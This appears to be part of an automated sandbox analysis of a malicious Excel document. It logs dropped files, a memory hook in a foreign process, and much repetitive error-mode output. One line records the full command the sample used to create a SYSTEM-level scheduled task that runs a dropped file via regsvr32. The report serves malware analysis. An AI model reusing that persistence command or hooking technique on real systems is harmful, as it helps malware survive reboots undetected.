Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb4 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb8 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb> source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdbrn source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.745476578.0000000000B22000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.892965832.00000000003A2000.00000004.00000001.sdmp
Source:	Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdbH source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbz source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb3 source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbj source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbr source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbd source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbP source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbV source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb~ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb* source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb\ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ED03CA LoadLibraryA,GetProcAddress,

5_2_00ED03CA

Source: ritofm.cvm.5.dr

Static PE information: section name: .code

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	1_2_0105823C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx	1_2_01058242
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	1_2_01058274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx	1_2_010582B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	1_2_010582EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	1_2_0105830D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push esp; mov dword ptr [esp], 00000001h	1_2_0105831A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_0105833C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_01058370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edi	1_2_01058444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx	1_2_0105847E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx	1_2_010584E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx	1_2_010585B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx	1_2_01058652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_01058688
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edi	1_2_0105874E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push edi; mov dword ptr [esp], 00000001h	1_2_01057080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push ecx; mov dword ptr [esp], 00001000h	1_2_010570E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax	1_2_010571C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax	1_2_01057271
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax	1_2_0105738F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push edx; mov dword ptr [esp], 00000258h	1_2_010573AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax	1_2_010573BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx	1_2_01057536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax	1_2_010575A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx	1_2_010575C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050 push edi; mov dword ptr [esp], 00008000h	1_2_01057615
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], edi	1_2_01055450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], eax	1_2_010554C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105538D push ecx; mov dword ptr [esp], 00000001h	1_2_01055597
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], eax	1_2_01055648

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\ritofm.cvm			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm			Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\ritofm.cvm

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\ritofm.cvm
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\ritofm.cvm	Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\ritofm.cvm

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 6480 base: 113F380 value: E9 A2 43 D8 FF

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
